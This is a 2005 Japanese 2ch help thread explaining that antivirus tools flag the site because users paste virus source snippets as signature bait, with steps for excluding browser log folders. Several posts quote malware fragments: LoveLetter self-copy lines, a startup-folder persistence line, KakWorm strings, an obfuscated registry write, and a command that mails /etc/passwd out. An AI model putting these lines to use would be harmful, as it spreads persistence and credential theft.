ノートンがvbsウィルスのソースに誤反応3
at PCQA
1:他のアンチウィルスソフトが反応する場合もあります
05/03/01 01:58:58
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。
■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
URLリンク(info.2ch.net)
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
URLリンク(info.2ch.net)
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
前スレ
ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)
ノートンがvbsウィルスのソースに誤反応2
スレリンク(pcqa板)
テンプレ>>1-10あたり
2:ひよこ名無しさん
05/03/01 01:59:38
■既知のvbsウィルスのソース■
・VBS.Internal
出元はスレリンク(download板:197番)だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?
一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
URLリンク(www.symantec.com)
Q.ウイルスコードが貼られているのにノートン反応しない。。。
A.ウイルスコードが貼られている2ちゃんねるのスレをテストページとして使用するのは奨励されない。
なぜなら、ここで言われているノートンの反応は単なる掲示板とスキャンエンジンの「仕様の衝突」であり、
これからも同じページを見ればその都度反応するという保証がないから。
仕様というものは、ある時突然変更されたりするもの。
ネットサーフィン中のウイルス対策ソフトの常駐動作確認は、テスト用に作られたEICARテストファイルにアクセスして行うべき。
EICARテストファイル(正常に常駐していればURLにアクセスと同時に反応します)
URLリンク(www.eicar.org)
3:ひよこ名無しさん
05/03/01 01:59:46
/ ̄|
| |
| | / ̄ ̄ ̄ ̄ ̄ ̄
,― \ |
| ___) | ∩∩ ∠ リュンパッチ♪
| ___) | | |_| | \______
| ___) |\___(・∀・ )_____
ヽ__)_/ \___ _____, )__
〃 . / / / / 〃⌒i
| / ./ / / .i::::::::::i
____| /⌒\./ / / | ____|;;;;;;;;;;;i
[__]___| / /-、 .\_. / Uし'[_] .|
| || | / /i i / | || |
| ||____|____/ / .| .|\_ノ______..| || |
|(_____ノ /_| |_________..| || |
| LLLLLL./ __)L_| |LLLLLLLLLLLLLLLLL. | ||_____」
| || (_/ / i .| || | ||
|_|| / .ノ |_|| |_||
(_/
4:ひよこ名無しさん
05/03/01 02:00:21
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
< => <
> => >
& => &
" => "
それぞれしっかり置換されていれば反応しない、ここの掲示板の問題。
ノートンが反応するのは、ここの掲示板(2Ch)の仕様なので気にする必要なし。
ここは、時に他のウィルス対策ソフトが反応する場合もある。
反応したらソースを見てみるといい。他の掲示板と違うことに気付くはずだ。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)
■関連
ノートン入れたら2chに書きこめない人へ
URLリンク(ansitu.s53.xrea.com)
ノートンインターネットセキュリティ@2ちゃんねる検索
URLリンク(find.2ch.net)
【ノートン入れたら2chに書きこめない】人へ@2ちゃんねる検索
URLリンク(find.2ch.net)
5:ひよこ名無しさん
05/03/01 02:05:28
補足ありましたらお願いします。
6:ひよこ名無しさん
05/03/01 02:06:29
ニャンです
7:ひよこ名無しさん
05/03/01 18:00:01
Q.2ちゃんねるの板開いただけで反応します。
A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
URLリンク(service1.symantec.com)
↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
URLリンク(info.2ch.net)
8:ひよこ名無しさん
05/03/02 00:36:43
その他リンク@2ちゃんねる検索
エロサイト見たら…助けて下さい!
URLリンク(find.2ch.net)
パソコン初心者総合質問スレッド
URLリンク(find.2ch.net)
セキュリティ初心者質問スレッド
URLリンク(find.2ch.net)
9:ひよこ名無しさん
05/03/03 00:26:00
◆◇◆ 報告用テンプレ ◆◇◆ (暫定)
■>>1-9を読みましたか? 『YES/NO』
■2ちゃんねるの板・スレ・レス番のアドレス 『 』
■ノートンのメッセージ(ウイルス名) 『 』
■ブラウザの種類 『 』
■ノートンのヴァージョン 『 』
■ノートン以外のアンチウイルスソフト名 『 』
■その他. 『 』
10:ひよこ名無しさん
05/03/03 01:13:35
2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら
インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。
2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
URLリンク(info.2ch.net)
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
11:ひよこ名無しさん
05/03/03 02:43:55 7F9C8/Th
よろ
kak.hta';ken=wdt'START
ms-its:mhtml:file://c:\
12:ひよこ名無しさん
05/03/03 18:20:43
>>11
既出。
Wscript.KakWorm
スレリンク(pcqa板:946番)
Bloodhound.Exploit.6
スレリンク(pcqa板:932番)
13:ひよこ名無しさん
05/03/04 01:48:43 hGA62fOr
URLリンク(c-au.2ch.net)
このウイルスを解説してください
14:ひよこ名無しさん
05/03/04 22:18:30
DAT落ち阻止て神戸♪
>>13
VBS.LoveLetter.Var
スレリンク(pcqa板:928番)
ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。
15:ひよこ名無しさん
05/03/05 00:21:55 hfT/sPqY
ありがとう
しかしラブレター1個だけではないはず。
カーネルやネットワークも入っている。
一つ一つ解説してください。
16:ひよこ名無しさん
05/03/05 19:06:57 5lPM1YuQ
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
↑こういうのって最初に気づいた奴って天才だよな
17:cen ◆Pm9xOTJuM.
05/03/05 20:09:53 BE:10314454-#
あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
URLリンク(www.geocities.jp)
18:ひよこ名無しさん
05/03/05 22:58:07
あやすい・・・・・
19:cen ◆Pm9xOTJuM.
05/03/06 02:36:23 BE:28879878-#
>>18
自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。
20:名無しさん@お腹いぱーい。
05/03/06 22:24:25 BE:2830436-##
>>17,19
ご支援ありがとうございます。
URLリンク(ansitu.xrea.jp)
21:ひよこ名無しさん
05/03/06 22:26:34 NzpAHwS7
ここの1の解説キボン
URLリンク(c-au.2ch.net)
22:ひよこ名無しさん
05/03/06 22:32:03
==================================
=================/∧ =========/∧
===============/ / λ=======/ / λ ー
=============/ / λ====/ / λ ー /
===========/ / /λ =/ / /λ /
=========/ / / //λ / / //λ __
=======/  ̄ ̄ ̄ \ ___
=====./ / ̄ ) ( ̄ヽ λ /
====/ /●/ \● /λ /
===/ // \ /λ
===| / /| ___|____
==| ∧________ / //| /
==| ヽ────〆 ///// /|\
===| / / ////| |
===\ / / /////
=====\_ / //////__/. |
========\ ミ/ |
==========\ / ─┐
============\ \ . ─┤
==============\ \ . ─┘
================\ \
==================\ ・ \
=====================
======================
23:ひよこ名無しさん
05/03/09 04:14:09
hoshu
24:ひよこ名無しさん
05/03/09 22:29:16
未だにVIPの板更新すると、ノートン先生の逆鱗に触れてしまうオイラですが
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
らしいです、騒いでごめんなさい。
2chにかぎっては心配(゚听)イラネみたいです。
25:24
05/03/09 22:30:49
誤爆すいません
26:ひよこ名無しさん
05/03/10 12:00:18
>>24
スレタイにウィルスコードが書いてある模様。
27:ひよこ名無しさん
05/03/11 19:52:34
>>24
漏れもソレダ!!!
もう無視しまくりんぐwwwwwww
28:ひよこ名無しさん
05/03/11 19:54:19 2tTtEvgw
ノートンなんか使ってんなよ ハゲ
29:ひよこ名無しさん
05/03/11 20:20:02
A Boneを使用してるのですが、PC初心者の上の「初心者の質問」板をクリックするだけで、ノートンがウイルスを検知してしまいます。
しかも板を開く事もできません。毎回そうなってしまいます。
昨日、システムをスキャンしたら確かに感染していました。「初心者の質問」板だけ毎回そうなります。
これは何でしょうか?
30:ひよこ名無しさん
05/03/11 21:00:24
ぐはははははwwwVIPもそうだよ
31:名無しさん@お腹いぱーい。
05/03/11 22:14:43 BE:8803878-##
>>29
>>7見てね。
32:ひよこ名無しさん
05/03/12 00:37:07 eI8qHG/W
2ちゃんを普通に見ていただけなのにノートンから「ウィルス名は
Unix.Penguinで、ファイルを修復できません」と表示されてしまいました。何か対策は無いでしょうか?
ちなみに誤作動との見分け方はありますか?
33:ひよこ名無しさん
05/03/12 04:45:56
/ ̄|
| |
| | / ̄ ̄ ̄ ̄ ̄ ̄
,― \ |
| ___) | ∩∩ ∠ リュンパッチ♪
| ___) | | |_| | \______
| ___) |\___(・∀・ )_____
ヽ__)_/ \___ _____, )__
〃 . / / / / 〃⌒i
| / ./ / / .i::::::::::i
____| /⌒\./ / / | ____|;;;;;;;;;;;i
[__]___| / /-、 .\_. / Uし'[_] .|
| || | / /i i / | || |
| ||____|____/ / .| .|\_ノ______..| || |
|(_____ノ /_| |_________..| || |
| LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」
| || (_/ / i .| || | ||
|_|| / .ノ |_|| |_||
(_/
34:ひよこ名無しさん
05/03/12 21:15:24 KI7PmLwk
Open Janeをでスレを見てたらウィルスコードが張られてて
ウィルス警告が出てファイルが修復出来ませんとでました。
ウィルスコードをNGワードに入れたら、NGワードが全部消えて
デスクトップにあるNGWordtxtというアイコンを削除しようとすると
やはりウィルス警告が出て削除できません。
スキャンをするとあるファイルの所まで来ると電源が切れてしまいます。
ウィルス名は「Bloodhound.Exploit6」と出るのですが、どうしたらいいでしょうか・・・。
35:ひよこ名無しさん
05/03/12 21:50:19
>>34
∩∩
| |_| | / ̄ ̄ ̄ ̄ ̄ ̄ ̄
/ ̄\ ・∀・) < リュンパッチ♪
.r ┤ ト、 \ \_______
|. \_/ ヽ |
| __( ̄ | | |
| __)_ノ ̄ ̄ ̄ ̄\
ヽ___) ノ \
||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
|| || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
.|| ||
36:34
05/03/12 23:34:38
すみません。
1つは解決しましたがスキャンすると電源が落ちるのは直りませんので
これは他のスレで聞いてみます
37:ひよこ名無しさん
05/03/17 15:26:43
なんだ、最近多いと思ってたがウィルスコードのせいだったのか。
しかしこれってあぼーんされないのかな。
とりあえずここみて安心した。ありがと。
38:ひよこ名無しさん
05/03/26 15:19:56 Yoan0Q7l
Norton Anti Virusと使ってます。
ウイルス、Unix PenguinをNGワードに登録するには
どんな単語をNGワードにすればいいんですか?
Unix Penguinと反応するスレ内見てもそれらしい書き込みがないので分かりません。
39:ひよこ名無しさん
05/03/26 16:10:26
>>38
NGワードに登録するんではなく
Norton Anti VirusのオプションのAuto-Protectと手動スキャンでログフォルダを除外に指定しる
40:ひよこ名無しさん
05/03/26 16:12:46 Yoan0Q7l
>>39
いや、それはやってるんですけど、反応するんです。
多分、キャッシュフォルダの方も除外指定にしないとだめっぽいです。
でも、それはセキュリティー的によくないってどっかに書いてあったんで、
NGワードに登録したいんですけど、できないんでしょうか?
41:ひよこ名無しさん
05/03/26 16:16:33
>>40
2ちゃんねるブラウザのログフォルダを除外にしても2ちゃんねるブラウザで閲覧中に反応するの?
42:ひよこ名無しさん
05/03/26 16:26:59 Yoan0Q7l
>>41
そうです。Norton Anti VirusとLive2chの組み合わせでAnti Virusの設定で
Live2chのログフォルダは除外に設定してます。
でも、Live2chで見てるとUnix Penguinだけ反応します。
43:ひよこ名無しさん
05/03/26 16:29:39
>>42
設定パス間違えてない?
44:ひよこ名無しさん
05/03/26 16:32:08
これはどうだ?
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START
45:ひよこ名無しさん
05/03/26 16:33:47
と思ったら、VBS.Network.Eとかいうのも反応しっちゃってるよwww
どういうこと?
46:ひよこ名無しさん
05/03/26 16:35:49
それでええんや。
47:ひよこ名無しさん
05/03/26 16:37:15
スレリンク(pcqa板:43番)
48:ひよこ名無しさん
05/03/26 16:37:34
>>45
、-'''"´ ̄ ̄`"''''-、
/ / ;;;;;;;;;;;;; \ \⌒⌒
/ ..::;;● ;;;;;;;;;;;;;, ●;;;;;;;;;::ヽ ^^
|. .::;;;;;;;;;;;(__人__);;;;;;;;;;;;;;;;::.|
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
:::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::
:::::::;;;;;;;;;;;;;;;;;;;;;;;;;
::::::::::::::::∧_∧ そうやってなんでも
::::::::: ( ::;;;;;;;;:) VIPのせいにしてりゃいいさ…
_.. /⌒:::;;;;;ヽ
-― ―'ー'-''―-''/ / ::;;;;;;;;:| |―'''ー'-''―'`'
,, '''' . ''''' と./ゝ_;_;_ノヽつ 、、, ''" それがVIPクオリティ…
,,, '' ,,, ::;;;;;;;;;::: ,, ''''' ,,,, URLリンク(ex7.2ch.net)
49:ひよこ名無しさん
05/03/26 16:38:45 Yoan0Q7l
>>43
いや、間違えてないと思います。
なんか他のウイルスにも反応してる。。。Network.E。
50:ひよこ名無しさん
05/03/26 16:40:10
>>49
いやいや、間違えてるんだろ?
51:ひよこ名無しさん
05/03/26 16:43:50 Yoan0Q7l
>>50
いや、C\ProgramFiles\Live2ch\logになってるからあってると思います。
52:ひよこ名無しさん
05/03/26 16:48:03
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l
53:ひよこ名無しさん
05/03/26 16:54:31
>>51
除外に設定する時にサブフォルダも含めるにチェック入れた?
54:ひよこ名無しさん
05/03/26 17:05:16
チン ☆ チン ☆
チン マチクタビレタ〜 チン ♪
♪
♪ ☆チン .☆ ジャーン! マチクタビレタ〜!
☆ チン 〃 ∧_∧ ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
ヽ ___\(・∀・ #) /\_/ < うっかりさん51の報告まだ〜?
チン \_/⊂ つ ‖ \__________
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄/| ‖ マチクタビレタ〜!
|  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :| /|\
| |/
55:ひよこ名無しさん
05/03/26 17:07:33
もう戻ってきません。
56:ひよこ名無しさん
05/03/26 17:21:58 Yoan0Q7l
>>53
チェック入ってます。
57:ひよこ名無しさん
05/03/26 17:27:12
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l
58:ひよこ名無しさん
05/03/26 17:32:20
>>56 もうシマンテックに聞きなさい
59:ひよこ名無しさん
05/03/26 19:17:05 Yoan0Q7l
>>58
了解w
ありがとうございました
60:ひよこ名無しさん
05/04/08 23:17:51 tNlrsDBu
画像板から誘導されてきました。
「2chブラウザのログ保存フォルダを「除外」に設定」
というのはどうやってやるんでしょうか?
壺を使ってます。
初心者すぎてすいません。どなたかよろしくお願いいたします。
61:ひよこ名無しさん
05/04/08 23:23:05
>>60
テンプレに書いてあるだろ
62:ひよこ名無しさん
05/04/09 00:06:17 Zkyvn8EZ
Norton Anti VirusのAuto-Protectと手動スキャンで壺フォルダを除外に指定しても、壺で閲覧中に反応します。
よくわかりません・・・orz
63:ひよこ名無しさん
05/04/09 00:07:00 tNlrsDBu
↑
60です
64:ひよこ名無しさん
05/04/09 19:08:32 zr8Dnfd3
,:::-、 __
,,r::::::::::::〈:::::::::) ィ::::::ヽ
〃::::::::::::;r‐''´:::::::::::::::::::::ヽ::ノ
,'::;'::::::::::::::/::::::::::::::::::::::::::::::::::::
l::::::::::::::::::l::::::::::●::::::::::::::●:::::ji
|::::::::::::::::::、::::::::::::::( _●_)::::::,j:l クマー!
}::::::::::::::::::::ゝ、::::::::::|∪|_ノ::;!
. {::::::::::::::::::::::::::::`='=::ヽノ:::::/
';::::::::::::ト、::::::::::::::i^i::::::::::::/
`ー--' ヽ:::::::::::l l;;;;::::ノ
【ラッキーレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば14日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です
65:ひよこ名無しさん
05/04/12 18:29:30
今まで書き込めなかったのはノートン先生の仕業だったのか
このスレのおかげで助かりました
66:ひよこ名無しさん
05/04/12 22:20:35 kw9rPCF2
マカフィーで反応
67:66
05/04/12 23:08:34 kw9rPCF2
駆除も削除も出来ないんだけどほっといていいのですか?
68:ひよこ名無しさん
05/04/18 19:11:29 PlotUVoz
>>66
自分もそうなるよ。
69:ひよこ名無しさん
05/04/18 22:19:38
すいません、ノートンAV2005なんですが、Janeのログを除外に設定したいんですが
AV2005のオプションを開いても「除外」っていう項目が無いのですけど
どうすれば設定できるのですか?
ご指導、お願い致します。
70:ひよこ名無しさん
05/04/19 00:47:01 9XxAkRTd
sagase
71:ひよこ名無しさん
05/04/22 15:13:49 ZNT0DAb6 BE:64317479-
大空寺あゆ親衛隊対策
(1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック
(2)「Norton AntiVirusの設定」をクリック
(3)左側にある「Auto-Protect」をクリック
(4)その下に出てきた「除外」をクリック
(5)「除外する項目」の「新規」をクリック
(6)「C:\Program Files\Live2ch\log」(Live2chの場合)と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック
(7)左側にある「Auto-Protect」をクリック
(8)(4)〜(6)をもう一度繰り返す
(9)設定画面が消えるまで「OK」をクリックする
72:ひよこ名無しさん
05/04/22 19:25:55
∧ l'vヘ
ハ ┌( ;/ ト, ,、 rヘ r'^ナrジ-z
__}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr〜^′
'っヾ、r'__ |レ'ノ_C'入彳勺ソメろ_j/し-,_
`フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐'
<_ゝし||フぅ(ひzメ__ゝ'l !'そ
~zヾ|て 、l レ^ //'| |'~
| | ヽl| // }|
| :! || | | ,/ ,' すいません、ちょっと通りますよ
| :{. || | |/ /
l !|| | | /
ヽ ヽ.|/ //
_,r)_ j (_,( ciz
,ノこ_- __,ーヽ ん|Zゥ レz zjそ_
} ... 丿 ろ、,_!|乙7ムLそ/し-z
ノ""'' 一( `う.l !シ/ア了//_⊂,
/、__ ヽ ^'| |~//,/_ソ ハr^
/ ...... ーl | |// //ノ
/~"' 、__/ ,,,...} |/ ///
{' _ `y′ 一 / r'〜(_ノ
人 =/‐- ハ 丿" ''(
ヽ '' / __,, / / ‐- ''')
'∨ X. }''' ....ノ
j ー/ /== ノ'ヽ
/=‐ r'´-ヽ } ー/'''' {
,' _,, 人 ''"`、 ノ.. '' ノ`ヽ ''"ヽ
{ー / \ -'} / / \'''}`
ハ 〈 )八 ( f )ハ
ヽ ) (( )ノ /
ノ/ ') _/
73:ひよこ名無しさん
05/04/24 20:15:37 P3pvijoD
ちゃんと2ch.netとAuto-Protectと手動スキャンで除外設定しましたが
VBS.Internalがしつこく警告ストロムしてきます
他に必要な手順はありますか?
74:ひよこ名無しさん
05/04/24 20:59:20 KLwGdhW7
>>72
ひわいな大根買い占める! ハイ!
(( (`Д´) (`Д´) ))
(/ /) (| |)
< ̄< < ̄<
ハイ! ハイ! ハイ
(. `Д)_(Д´ )
ノ ノヽ | |>
ノ > < ヽ
ハイ!
(. )_(`Д´)ノ
ノ ノヽ |ヘ |
ノ > <
ハイ! ワァオ!
(゜∀゜)_(゜∀゜)ノ
ノ ノヽ |ヘ |
ノノ <
あるある探検隊!
_(Д´ ) _(Д´ )
ヘ| |\ ヘ| |\
< <
あるある探検隊!
( `Д)_ ( `Д)_
/| |ヘ /| |ヘ
> >
75:ひよこ名無しさん
05/04/25 01:12:19
ウイルス対策ソフトの検出力調査結果
URLリンク(www.geocities.jp)
76:ひよこ名無しさん
05/04/27 04:32:31
スレリンク(anime板)の
>>17の奴のウイルスってどうやって除外するんですか?本気でむかつきます
77:ひよこ名無しさん
05/04/29 17:10:59 EryoL680
>>71
初心者はテンプレ読んでも何を言っているのかが分からなかったりするので
こういう細かい解説、感謝します。
っていうか大空寺死んで欲しい。(´・ω・`)
78:ひよこ名無しさん
05/04/29 18:11:53 xmX9upML
>>77
透明あぼーんで存在を消し去りましょう。スッキリするよ
79:ひよこ名無しさん
05/04/29 18:38:53 EryoL680
>>78
透明あぼーんではノートンの反応はおさまらなかったんです。
なにやらメール欄に変なものを書き込んでいるようで。
80:cen ◆Pm9xOTJuM.
05/04/29 18:42:27 BE:64394126-###
>>79
>>17のを使うと、メール欄のものでも消し去ります。
81:ひよこ名無しさん
05/04/29 18:44:17
>>79
>>71の手順でノートンの誤反応を解消し、専ブラの透明あぼーんで
糞コテやウイルス厨を見えなくするって意味。
分かりにくくてスマソ
82:ひよこ名無しさん
05/04/29 19:58:14 EryoL680
>>80
>>81
いろいろとありがとうございました。
あいつら(大空寺とかネオとか)どうにかならないもんですかね…
83:ひよこ名無しさん
05/05/01 13:50:58 beE/OXQq
XPにはNorton AntiVirusインストールできたのに、98にはできない。
98のウイルススキャン(無償)で感染ファイル35ってでたけど
これをどうすればいいの?
84:ひよこ名無しさん
05/05/05 01:29:28
Live2chでUnixPenguinがうざい場合
(1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック
(2)「Norton AntiVirusの設定」をクリック
(3)左側にある「Auto-Protect」をクリック
(4)その下に出てきた「除外」をクリック
(5)「除外する項目」の「新規」をクリック
(6)「C:\Program Files\Live2ch\log」と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック
(6)「C:\Program Files\Live2ch\temp.htm」も追加する。
(7)左側にある「Auto-Protect」をクリック
(8)(4)〜(6)をもう一度繰り返す
(9)設定画面が消えるまで「OK」をクリックする
85:cen ◆Pm9xOTJuM.
05/05/05 01:48:13 BE:128787146-##
あ、そうそう。
>>17のプログラムを更新しましたです。
86:ひよこ名無しさん
05/05/06 13:08:01
その他→脅威カテゴリでも「除外」が出てくるけどここは設定しなくていいの?
って、脅威カテゴリで何をしてくれるのかのかよくわからない。(NIS2005)
>>71 >>84
>(7)左側にある「Auto-Protect」をクリック
(7)左側にある「手動スキャン」をクリック ・・・じゃないのかな。
87:ひよこ名無しさん
05/05/06 13:10:11
大体、「除外」する項目をAuto-Protectと手動スキャンで
分けている理由がわからない。NIS2002の設定は簡単だった。
88:ひよこ名無しさん
05/05/08 22:01:59
URLリンク(info.2ch.net)
89:ひよこ名無しさん
05/05/11 23:56:43 TkQmWlam
cat /etc/passwd | mail nobody
これが反応するのか?
90:ひよこ名無しさん
05/05/12 00:23:51
>>89
見事にUnixPenguinと判定してくれた
91:ひよこ名無しさん
05/05/13 19:15:33
f
92:ひよこ名無しさん
05/05/18 02:51:07 iHDhJttO
>>84
Live2chでUnixPenguinがうざい場合
IEでうざい場合はどうすればよろしいのでしょうか?????
93:ひよこ名無しさん
05/05/18 02:53:32
>>92
IEで2ちゃん見るなよ。
94:ひよこ名無しさん
05/05/18 03:04:55 iHDhJttO
>>93
え???
ダメなんですか???
すみません・・・
初心者なもので・・・
詳しく教えていただけませんか・・・
95:ひよこ名無しさん
05/05/18 03:09:44
>>94
ダメじゃないけど、専用ブラウザのほうがずっと便利。
どこまで読んだかわかるし、ログはずっと残せるし、
新着分だけダウンロードするから速いし、軽いし。
96:ひよこ名無しさん
05/05/18 03:13:22 iHDhJttO
>>95
ありがとうございます。
勉強になりました。
今日はウイルスが出てかなりテンパりました(苦笑)
また明日からがんばります!
でしつこいんですが、
IEでうざい場合はどうすればよろしいのでしょうか?
97:ひよこ名無しさん
05/05/18 03:17:42
>>96
IEの一時フォルダを除外すれば警告は出なくなるが、
ほかのサイトで感染してしまう。
98:ひよこ名無しさん
05/05/22 02:22:35 GqakRWGu
勇気が無くて見られない画像解説スレ Part702
スレリンク(entrance板)
すいません、↑のスレッドをLive2chで開いただけで
発生源:C:\Documents and Settings\kousuke\Local Settings
\Temporary Internet Files\Content.IE5\MVAP076F\woid[1].jpg
Trojan Horse
とか出るんですけど、誤反応ですか?
vbsのウィルスコードと大空寺のメール蘭攻撃は
除外しているはずなんですが。
ありえないとは思いますがて開いただけで感染したんですか?
Trojan Horse
ウィルス名:
Trojan Horse
別名:
感染場所:
.EXE ファイル
